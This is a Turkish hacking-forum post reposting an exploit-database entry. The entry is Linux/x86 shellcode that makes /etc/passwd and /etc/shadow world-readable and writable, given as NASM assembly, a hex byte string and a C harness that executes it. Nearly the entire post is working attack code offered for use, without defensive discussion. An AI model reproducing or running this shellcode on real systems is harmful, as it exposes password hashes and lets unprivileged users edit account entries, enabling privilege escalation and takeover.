Hoşgeldin Misafir

Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)

NasyoneL

NasyoneL

Karanlık Özgürlüktür
Forum Yöneticisi
25 Ağu 2017
42,664 Mesaj
TIM Görevleri
1

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
# Date: 10/07/2019
# Exploit Author: Xavier Invers Fornells
# Contact: [email protected]    
# Tested on: Debian 4.19.28
# Architecture: x86
# Size: 61 bytes
 
 
 
#################################### chmod.nasm ####################################
 
global _start
section .text
 
_start:
        push byte 15            
        pop eax                 
        push byte 0x64          
        push word 0x7773        
        push 0x7361702f         
        push 0x6374652f         
        mov ebx, esp
         
        push word 0x1b6 
        pop ecx         
         
        int 0x80                
 
        push byte 15
        pop eax         
        push byte 0x77
        push word 0x6f64
        push 0x6168732f
        push 0x6374652f
        mov ebx, esp
 
        push word 0x1b6
        pop ecx
 
        int 0x80
 
        push byte 1
        pop eax
        int 0x80
 
#################################### shellcode.c ####################################
 
#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
 
main()
{
 
        printf("Shellcode Length:  %d\n", strlen(code));
 
        int (*ret)() = (int(*)())code;
 
        ret();
 
}
 
#  0day.today [2019-07-15]  #
 
Geri
Üst